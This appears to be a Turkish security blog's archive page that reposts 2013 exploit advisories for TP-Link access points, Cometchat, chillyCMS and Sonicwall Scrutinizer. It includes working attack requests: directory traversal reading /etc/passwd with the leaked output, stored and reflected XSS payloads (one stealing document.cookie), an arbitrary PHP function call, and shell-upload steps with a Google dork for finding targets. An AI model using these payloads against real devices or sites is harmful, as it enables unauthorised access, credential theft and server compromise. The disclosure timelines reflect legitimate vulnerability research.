Archive for 15 Şubat 2013

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit

photodex-exploit

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Python Exploit Read more

TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities

TP-Link TL-WA701N / TL-WA701ND – Roter'lerde açıklar bulunmuş olup, açık sayesinde /etc/passwd okunabilmekte XSS açığı oluşmaktadır.

 Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============ Vulnerable Firmware Releases: ============

Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND

Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============ Vulnerability Overview: ============

    * Directory Traversal: 

Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==> >  no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

 <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> 
 <HTML> 
 <HEAD>  <TITLE> TL-WA701N </TITLE> 
 <META http-equiv=Pragma content=no-cache> 
 <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> 
 <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> 
 <SCRIPT language="javascript" type="text/javascript">  <!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//-->  </SCRIPT> 
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: 

http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

    * Stored XSS: 

Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

->  Wireless MAC Filtering ->  Add or Modify ->  put your XSS in the description (parameter Desc)

Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)> &Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

This XSS vulnerability was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

    * Stored XSS: 

->  System Tools ->  SNMP:

Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name= </script> &sys_location= <script> alert(&#39;XSSed&#39;) </script> &get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter: 

The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

The stored XSS vulnerability in the Desc parameter was already documented on a other device and firmware version: http://www.exploit-db.com/exploits/19774/

============ Time Line: ============

August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

===================== Advisory end =====================

Cometchat Multiple Vulnerabilities

Cometchat chatroom.php scriptinde XSS açığı bulunmuş olup açık hakkında açıklamalar ve açığın kullanımı şu şekilde;

 ##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ _________ _
 __  / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
____/__,_/_/ /_/_/____/____/__,_/_/  /_/___/____(_)____/_/   __, /  
                                                                /____/   
##################################################################################                                                                                                                              
Cometchat chat Application All Version Multiple Vulnerabilities
Cometchat is a chat application which in use Vbulletin,Xenforo,SMF,MyBB and other integrated scripts
App Homepage : http://www.cometchat.com

Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team(Burtay,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################



1.)Code Execution P0C (modules/chatrooms/chatrooms.php)
call_user_func call_user_func($_GET[&#39;action&#39;]); 
Can use all php functions and cometchat function without arguments

Live Demo:http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo

2.)XSS P0C (plugins/handwrite/index.php)
echo echo  < < <EOD   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    <html>    <head>    <title> Download </title>     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>       <style>   html, body, div, span, applet, object, iframe,  h1, h2, h3, h4, h5, h6, p, blockquote, pre,  a, abbr, acronym, address, big, cite, code,  del, dfn, em, font, img, ins, kbd, q, s, samp,  small, strike, strong, sub, sup, tt, var,  dl, dt, dd, ol, ul, li,  fieldset, form, label, legend,  table, caption, tbody, tfoot, thead, tr, th, td {   margin: 0;   padding: 0;   border: 0;   outline: 0;   font-weight: inherit;   font-style: inherit;   font-size: 100%;   font-family: inherit;   vertical-align: baseline;      text-align: center;  }    html {    height: 100%;    overflow: hidden; /* Hides scrollbar in IE */  }    body {    height: 100%;    margin: 0;    padding: 0;  }    #flashcontent {    height: 100%;  }       </style>        </style>      </head>    <body>  <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"          codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"          width="100%"          height="100%"          align="middle"          id="main">        <param name="allowScriptAccess" value="sameDomain" />        <param name="movie" value="handwriting.swf" />        <param name="quality" value="high" />        <param name="bgcolor" value="#ffffff" />        <param name="FlashVars" value="tid={$toId}" />         <param name="scale" value="exactFit" />        <embed src="handwriting.swf"             width="100%"             height="100%"             autostart="false"             quality="high"             bgcolor="#ffffff"             FlashVars="tid={$toId}"             name="main"             align="middle"             allowScriptAccess="sameDomain"             type="application/x-shockwave-flash"             pluginspage="http://www.macromedia.com/go/getflashplayer" />    </object>  </body>    </html>   EOD; 
$toId = $_GET[&#39;id&#39;]; 

Live Demo:http://server/cometchat/plugins/handwrite/index.php?id=">  <script> alert(document.cookie) </script> 

chillyCMS 1.3.0 – Multiple Vulnerabilities

chillyCMS 1.3.0 Versiyonunda zip uzantılı dosya php uzantıya çevrilmek suretiyle shell upload açığı oluşmuş olup, açık hakkında açıklamalar şu şekilde;

# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: ?v=6B3rND9S75g


# Vulnerability
        Failure to Restrict URL Access
        chillyCMS uses 302 redirects to restrict access to the unautorized pages.
        
# Exploit
    Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
    Step 2: Access http://localhost/chillyCMS/admin/


# Vulnerability
        Arbitrary File Upload
        chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory
        
# Exploit
    Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
    Step 2: Upload shell.zip
        Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php
        
# History
        11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
        12 March 2012 - Vendor responds back, exchanges few mails.
        15 November 2012 - Vendor discontinues further development.
        15 February 2013 - Published the vulnerabilities and exploits to the public.
        
# How to reproduce
        The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.

Sonicwall Scrutinizer v9.5.2 – SQL Injection Vulnerability

Sonicwall Scrutinizer v9.5.2 – SQL Injection Açığı bulunmuş Olup Açığın oluşum yeri ve Açık hakkındaki açıklamalar aşağıdaki gibidir;

Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability


Date:
=====
2013-02-13


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped


VL-ID:
=====
789


Common Vulnerability Scoring System:
====================================
7.3


Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool
to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers.
Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight
into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range
of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can
deploy Scrutinizer as a virtual appliance for high performance environments.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )



Abstract:
=========
The Vulnerability Laboratory Research Team discovered SQL Injection vulnerability in the Dells Sonicwall OEM Scrutinizer v9.5.2 appliance application.


Report-Timeline:
================
2012-12-05:     Researcher Notification & Coordination
2012-12-07:     Vendor Notification
2013-01-08:     Vendor Response/Feedback
2013-02-10:     Vendor Fix/Patch
2013-02-11:     Public Disclosure


Status:
========
Published


Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application.
The bug allows remote attackers to execute/inject own sql statement/commands to manipulate the affected vulnerable application dbms.
The sql injection vulnerability is located in the fa_web.cgi file with the bound gadget listing module and the vulnerable orderby or
gadget parameters. Exploitation requires no user interaction & without privileged application user account. Successful exploitation of
the remote sql vulnerability results in dbms & application compromise.

Vulnerable File(s):
                        [+] fa_web.cgi

Vulnerable Module(s):
                        [+] gadget listing

Vulnerable Parameter(s):
                        [+] orderby
                        [+] gadget


Proof of Concept:
=================
The remote sql injection vulnerability can be exploited by remote attackers without required privileged application user account
and also without user interaction. For demonstration or reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27



Solution:
=========
1) Scrutinizer team created a own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection


Risk:
=====
The security risk of the remote sql injection vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ()


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.vulnerability-lab.com/register
Contact:             -                 - 
Section:    video.vulnerability-lab.com         - forum.vulnerability-lab.com                  - news.vulnerability-lab.com
Social:                  -                 - 
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ( or ) to get a permission.

                                        Copyright � 2012 | Vulnerability Laboratory



--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: